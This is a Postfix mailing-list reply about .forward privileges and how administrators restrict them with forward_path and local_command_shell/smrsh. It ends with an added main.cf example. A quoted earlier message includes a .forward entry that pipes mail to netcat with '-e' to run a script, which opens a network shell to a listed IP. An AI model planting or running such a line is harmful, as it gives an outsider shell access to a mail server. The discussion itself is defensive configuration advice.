Tomasz Pala via Postfix-users:
> On 2024-12-20 19:02, Wietse Venema via Postfix-users wrote:
> >
> >> You say "local is non-chrootable" - I say local is the mostly exposed,
> >> running user-provided content, binary and environment. It's the local
> >> which can exploit CVE in your kernel. You're not preventing any of this.
> >
> > I think that statements like this are disqualifying their speaker from
> > this discussion.
>
> target $ cat .forward
> "| nc 10.1.16.9 1919 -e ~target/.forward_shell2.py"
Postfix separates mechanism from policy.

Mechanism: Postfix .forward impersonation aims to provide the same rights as a user that has interactive shell access. If Postfix provides more rights than interactive shell access, that is a security hole in Postfix. If Postfix provides less, then Postfix is just broken.

Policy: If a user has no interactive shell access, then their .forward privileges can be taken away with forward_path, and they can be reduced with local_command_shell.

https://www.postfix.org/postconf.5.html#forward_path
with
https://www.postfix.org/postconf.5.html#local_command_shell
https://linux.die.net/man/8/smrsh

What are your contributions to the open-source ecosystem?

	Wietse
_______________________________________________
Postfix-users mailing list -- postfix-users@postfix.org
To unsubscribe send an email to postfix-users-le...@postfix.org
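The two policy knobs named in the reply, written out as a main.cf fragment. This is an added example, not configuration from the thread or from the Postfix project; the /var/forward directory layout and the /usr/bin/smrsh binary path are assumptions for illustration, and the directory smrsh searches for commands is compiled into the smrsh binary on each system.

```conf
# main.cf fragment (added example, not from the thread)

# Policy 1: take .forward away from users by searching for it only in an
# administrator-owned directory instead of $home. The Postfix default is
#   $home/.forward${recipient_delimiter}${extension}, $home/.forward
# A user who cannot write to /var/forward/$user (assumed path) has no
# usable .forward file at all, whether or not they hold a login shell.
forward_path = /var/forward/$user/.forward${recipient_delimiter}${extension},
    /var/forward/$user/.forward

# Policy 2: reduce what a "|command" entry in .forward may run. smrsh
# executes only programs found in its fixed command directory, so an entry
# such as the "| nc ..." line quoted above is refused unless an administrator
# deliberately places nc (or a link to it) in that directory. The default
# (empty) value of local_command_shell means /bin/sh -c, which imposes no
# such restriction. The smrsh path below is an assumption for this example.
local_command_shell = /usr/bin/smrsh -c
```

After changing either parameter, reload Postfix and check the effective values with `postconf forward_path local_command_shell`; the continuation line under forward_path is valid main.cf syntax because it starts with whitespace.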